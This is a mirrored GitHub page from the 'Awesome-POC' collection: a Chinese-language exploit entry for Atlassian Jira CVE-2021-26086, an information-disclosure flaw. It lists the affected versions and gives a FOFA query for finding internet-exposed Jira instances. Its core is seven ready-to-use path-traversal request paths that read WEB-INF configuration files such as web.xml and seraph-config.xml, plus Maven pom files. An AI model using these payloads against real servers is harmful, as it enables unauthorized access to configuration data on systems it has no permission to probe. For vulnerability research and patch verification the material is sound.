admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Atlassian Jira 敏感信息泄露 CVE-2021-26086.md

39 lines
967 B
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Atlassian Jira 敏感信息泄露 CVE-2021-26086
## 漏洞描述
JIRA是Atlassian公司出品的项目与事务跟踪工具被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。
参考链接:
- https://jira.atlassian.com/browse/JRASERVER-72695
## 漏洞影响
```
version < 8.5.14
8.6.0 ≤ version < 8.13.6
8.14.0 ≤ version < 8.16.1
```
## 网络测绘
```
app="ATLASSIAN-JIRA"
```
## 漏洞复现
poc
```
/s/cfx/_/;/WEB-INF/web.xml
/s/cfx/_/;/WEB-INF/decorators.xml
/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
```
Reference in New Issue Copy Permalink